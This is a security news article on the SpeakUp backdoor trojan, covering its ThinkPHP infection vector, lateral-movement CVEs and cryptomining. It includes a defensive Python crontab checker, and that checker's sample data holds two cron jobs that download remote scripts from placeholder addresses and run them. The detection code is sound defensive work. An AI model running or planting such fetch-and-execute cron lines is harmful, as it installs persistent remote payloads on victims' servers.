SpeakUp backdoor trojan can run on six different Linux distributions, and even on macOS
Hackers have developed a new backdoor trojan that is capable of running on Linux systems. Named SpeakUp, this malware is currently distributed to Linux servers mainly located in China.
The hackers behind this recent wave of attacks are using an exploit for the ThinkPHP framework to infect servers with this new malware strain.
Once the trojan gains a foothold on vulnerable systems, hackers can use it to modify the local cron utility to gain boot persistence, run shell commands, execute files downloaded from a remote command and control (C&C) server, and update or uninstall itself.
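The cron persistence and fetch-and-execute behaviour described above is something a defender can look for in a host's crontabs. The checker below is an added example, not code from the article or from Check Point's report; the crontab entries and the addresses in them are constructed for illustration (RFC 5737 documentation ranges), not real indicators.

```python
import re

# Constructed sample crontab (not taken from the report). The first two jobs
# mimic "download from a remote host and run it" persistence; the last two
# are ordinary maintenance jobs that must not be flagged.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
*/10 * * * * curl -fsSL http://198.51.100.7/payload.sh | sh
@reboot wget -q -O /tmp/.x http://203.0.113.9/x && chmod +x /tmp/.x && /tmp/.x
0 3 * * * /usr/bin/certbot renew --quiet
30 2 * * 0 tar czf /var/backups/home.tgz /home
"""

FETCH_TOOLS = re.compile(r"\b(curl|wget)\b.*\bhttps?://", re.IGNORECASE)
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|z|k)?sh\b")
TMP_EXEC = re.compile(r"(/tmp|/dev/shm|/var/tmp)/\S+")
# Either a @reboot/@daily style keyword or the five standard schedule fields.
SCHEDULE = re.compile(r"^(@\w+|(\S+\s+){5})")


def flag_cron_lines(crontab_text):
    """Return (line_no, reason, entry) for each job that downloads and runs
    remote content or executes something from a temporary directory."""
    findings = []
    for no, line in enumerate(crontab_text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        m = SCHEDULE.match(stripped)
        if not m:
            continue  # e.g. MAILTO=... environment lines are not jobs
        command = stripped[m.end():]
        reasons = []
        if FETCH_TOOLS.search(command):
            if PIPE_TO_SHELL.search(command):
                reasons.append("remote script piped to shell")
            else:
                reasons.append("remote download in cron job")
        if TMP_EXEC.search(command):
            reasons.append("executes from temp directory")
        if reasons:
            findings.append((no, "; ".join(reasons), stripped))
    return findings


if __name__ == "__main__":
    for no, reason, entry in flag_cron_lines(SAMPLE_CRONTAB):
        print(f"line {no}: {reason}\n    {entry}")
```

On a live system the same function can be fed the contents of `/etc/crontab`, the files under `/etc/cron.d`, and each user's crontab to spot jobs that match the pattern.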
Check Point researchers, who first spotted this new backdoor three weeks ago, on January 14, say SpeakUp also comes with a built-in Python script that the malware uses to spread laterally through the local network.
This script can scan local networks for open ports, brute-force nearby systems using a list of pre-defined usernames and passwords, and use one of seven exploits to take over unpatched systems. This list of second-stage exploits includes the likes of:
CVE-2012-0874: JBoss Enterprise Application Platform Multiple Security Bypass Vulnerabilities
CVE-2010-1871: JBoss Seam Framework remote code execution
JBoss AS 3/4/5/6: Remote Command Execution
CVE-2017-10271: Oracle WebLogic wls-wsat Component Deserialization RCE
CVE-2018-2894: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware
Hadoop YARN ResourceManager - Command Execution
CVE-2016-3088: Apache ActiveMQ Fileserver File Upload Remote Code Execution Vulnerability
Once it compromises a new machine, SpeakUp deploys a copy of itself there. Check Point says SpeakUp can run on six different Linux distributions and even on macOS systems.
The group behind this recent scan-and-infect campaign has been busy using SpeakUp to deploy Monero cryptocurrency miners on infected servers. The Check Point team says the group has made roughly 107 Monero coins since the start of their campaign, which is around $4,500.
While the SpeakUp authors are currently exploiting a vulnerability (CVE-2018-20062) in a Chinese-only PHP framework, they could easily switch to other exploits to spread their backdoor to an even wider array of targets, although so far they have not been seen targeting anything except ThinkPHP.